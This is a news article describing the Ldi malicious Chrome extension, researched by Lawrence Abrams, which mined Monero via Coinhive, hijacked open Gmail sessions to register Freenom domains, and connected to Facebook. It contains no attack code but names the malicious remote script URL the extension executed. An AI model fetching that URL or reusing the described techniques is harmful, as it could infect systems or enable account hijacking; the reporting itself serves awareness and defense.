A new and very ambitious malicious Chrome extension called Ldi has been uncovered, one that injects the Coinhive cryptocurrency miner into the target computer, accesses the victim's Gmail and Facebook accounts and registers newly created domains in that person's name.
The extension was researched by Bleeping Computer Founder Lawrence Abrams who said the extension was seen on the Chrome extension store, and has since been removed, advertising itself as a way to check if a website is compatible Mac. However, what it truly contains two JavaScript files called jarallax.min.js and bootstrap-filestyle.min.js. The first step has this remote script https://fbcdnxy.net/coobgpohoikkiipiblmjeljniedjpjpf/remote-postal-code.json, which is executed when Chrome is opened.
“First, the extension will connect to Facebook. While I did not see it do anything other than connect, there is quite a lot of code dedicated to Facebook, which could be for spreading the extension via Facebook Messenger,” Abrams wrote.
The next step is downloading Coinhive which immediately goes to work digging up Monero, but this activity also generates the first sign for the victim that something is amiss with their system. Primarily, seeing the computer's CPU usage spiking as it begins the mining process, Abrams told SC Media.
The malware's other malicious actions are also noticeable. In order to register the new domains using the victim's name the malware uses the associated Gmail address. Luckily, it can only grab this if the user has it open and running in the background, otherwise this aspect of the attack does not take place. But if Ldi is successful in getting into Gmail and creating the domains the victim will see a registration email from Freenom, a domain service.
“Another symptom would be receiving an email asking you to verify your email address from Freenom. While the extension automatically clicks on this link in the email, it does not delete the email so a victim will see it in their inbox. All the rest is done behind the scenes without the user even knowing,” Abrams said.
For an unknown reason only four domains are created and registered.
Abrams was not certain what these domains are used for, but speculated it could be to spread additional malware in the future.
Ldi was quickly spotted and removed, Abrams said, but using a malicious extension to spread malware is a tried and true method that has suckered in many thousands of victims.
The good news is once the extension is spotted and removed Coinhive stops operating and the attacker loses access to the person's Gmail and Facebook accounts.
“Once the extension is removed, everything goes back to normal, except you still have these domains registered under your email being used for who knows what. Definitely nothing good,” Abrams concluded.